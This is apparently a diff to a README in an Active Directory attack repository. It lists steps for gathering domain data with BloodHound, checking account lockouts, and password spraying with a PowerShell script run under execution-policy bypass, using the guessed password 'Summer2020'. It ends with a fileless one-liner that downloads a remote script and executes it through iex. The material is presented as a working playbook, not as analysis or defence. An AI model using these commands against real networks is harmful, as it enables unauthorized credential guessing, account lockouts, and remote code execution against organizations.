OnlyTheShadowKnows/AD/README.md

 4. Could go and get Blood Hound / SharpHound, maybe collect some juicy details...
 5. Assess the current situation before the sparay - try getlockoutinfo.ps1 for details and getlocked.ps1 for lockout status.
 6. Then attempt the PW spray with pwspray.ps1

-6. A. Need to open up a PowerShell prompt w/ bypass: from command prompt, "PowerShell -exec bypass" should get you there.
+7. Need to open up a PowerShell prompt w/ bypass: from command prompt, "PowerShell -exec bypass" should get you there.
-6. B. Need to import the script - Type 'Import-Module pwspray.ps1', which is a more paranoid version of dafthack's pw spray script.
+8. Need to import the script - Type 'Import-Module pwspray.ps1', which is a more paranoid version of dafthack's pw spray script.
-6. C. Run the script - Invoke-DomainPasswordSpray -Password Summer2020 -OutFile results.txt
+9. Run the script - Invoke-DomainPasswordSpray -Password Summer2020 -OutFile results.txt
-6. D. Observe - Search-ADAccount –LockedOut.
+10. Observe - Search-ADAccount –LockedOut.
 Problems?
 Use control C and punt.
 Wait a bunch before you try again.

-7. Kick it up a notch maybe?
+11. Kick it up a notch maybe?
 Go fileless? powershell -nop -c "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/OnlyTheShadowKnows/AD/master/ADcounts.ps1')"